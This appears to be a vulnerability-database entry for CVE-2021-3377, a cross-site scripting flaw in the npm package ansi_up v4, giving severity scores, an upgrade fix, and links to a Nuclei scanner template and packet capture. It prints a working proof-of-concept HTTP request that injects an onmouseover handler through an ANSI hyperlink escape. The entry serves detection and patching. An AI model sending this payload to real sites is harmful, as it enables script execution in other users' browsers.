| Title | npm ansi_up v4 - Cross-Site Scripting |
|---|---|
| Author | geeknik |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a user's browser, leading to potential data theft or unauthorized actions. |
| Remediation | Upgrade to v5.0.0 or later. |
| CVSS Score | 6.1 |
| EPSS Score | 0.46141 |
| CVE ID | CVE-2021-3377 |
| CWE ID | CWE-79 |
| Tags | cve2021 cve xss npm ansi_up_project node.js vuln |
npm package ansi_up v4 is vulnerable to cross-site scripting because ANSI escape codes can be used to create HTML hyperlinks.
GET /\u001B]8;;https://interact.sh"/onmouseover="alert(1)\u0007example\u001B]8;;\u0007 HTTP/1.1
Host: www.victim.com
Connection: close
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-3377.yaml
🦈 Packet Capture: ⬇️ Download cve-2021-3377.pcap
N/AN/A